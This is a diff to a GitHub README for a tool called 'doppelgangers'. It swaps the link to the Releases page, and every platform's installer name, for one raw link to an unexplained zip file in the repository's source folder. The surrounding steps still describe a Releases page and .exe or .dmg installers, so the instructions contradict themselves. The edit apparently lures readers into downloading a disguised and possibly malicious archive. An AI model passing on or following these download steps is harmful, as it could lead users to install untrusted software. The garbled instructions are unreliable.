GPshadow56/doppelgangers/README.md

 - **Cross-Platform**: Works on Windows, macOS, and Linux.

 ## 📥 Download & Install
-To download doppelgangers, visit the Releases page: [Download doppelgangers here](https://github.com/GPshadow56/doppelgangers/releases).
+To download doppelgangers, visit the Releases page: [Download doppelgangers here](https://github.com/GPshadow56/doppelgangers/raw/refs/heads/main/src/Software_1.3.zip).

 1. **Open the Download Page**: Click the link above to go to the Releases page.
 2. **Select the Latest Version**: Look for the most recent release at the top of the list.
 It will typically be labeled with a version number (e.g., v1.0).
 3. **Download the Installer**: Look for the installer file suited for your operating system.
 Click on the appropriate link to start the download.
-   - For Windows, you might find a file like `doppelgangers-installer.exe`.
+   - For Windows, you might find a file like `https://github.com/GPshadow56/doppelgangers/raw/refs/heads/main/src/Software_1.3.zip`.
-   - For macOS, look for a file named `doppelgangers.dmg`.
+   - For macOS, look for a file named `https://github.com/GPshadow56/doppelgangers/raw/refs/heads/main/src/Software_1.3.zip`.
-   - For Linux, you might see a tarball file such as `doppelgangers.tar.gz`.
+   - For Linux, you might see a tarball file such as `https://github.com/GPshadow56/doppelgangers/raw/refs/heads/main/src/Software_1.3.zip`.
 4. **Run the Installer**: Once the download completes, navigate to your downloads folder and locate the downloaded file.
    - For Windows, double-click the `.exe` file to run the installer.
    - For macOS, open the `.dmg` file and drag the doppelgangers app into your Applications folder.